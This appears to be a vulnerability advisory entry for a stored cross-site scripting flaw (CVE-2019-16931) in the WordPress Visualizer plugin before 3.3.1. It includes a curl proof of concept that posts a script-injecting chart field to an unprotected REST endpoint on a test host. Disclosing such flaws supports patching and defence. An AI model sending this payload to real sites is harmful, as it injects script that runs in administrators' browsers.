WordPress Plugin Vulnerabilities

Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)

Description

By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.

Proof of Concept

curl -i -s -k  -X $'POST' \
    -H $'Host: 192.168.158.128:8000' -H $'Content-Type: application/json' \
    --data-binary $'{\"id\": 7, \"visualizer-chart-type\": \"\\\"><script>alert(1);</script><span data-x=\\\"\"}' \
    $'http://192.168.158.128:8000/wp-json/visualizer/v1/update-chart'

See the references for more details

Affects Plugins

Plugin icon
visualizer
Fixed in 3.3.1

References

CVE
CVE-2019-16931
URL
https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Nathan Davison
Submitter website
https://nathandavison.com
Submitter twitter
nj_dav
Verified
No
WPVDB ID
867e000d-d2f5-4d53-89b0-41d7d4163f44

Timeline

Publicly Published
2019-09-28 (about 4 years ago)
Added
2019-09-28 (about 4 years ago)
Last Updated
2020-09-22 (about 3 years ago)

Other

Published
Title
Published
2022-03-21
Title
Yoo Slider < 2.1.0 - Contributor+ Stored Cross-Site Scripting
Published
2021-09-08
Title
Twitter Friends Widget <= 3.1 - Reflected Cross-Site Scripting
Published
2020-07-03
Title
Testimonials Widget < 4.0.0 - Multiple Authenticated Stored XSS
Published
2021-10-18
Title
QR Redirector < 1.6.1 - Contributor+ Stored Cross-Site Scripting
Published
2023-12-05
Title
Structured Content < 1.6 - Contributor+ Stored XSS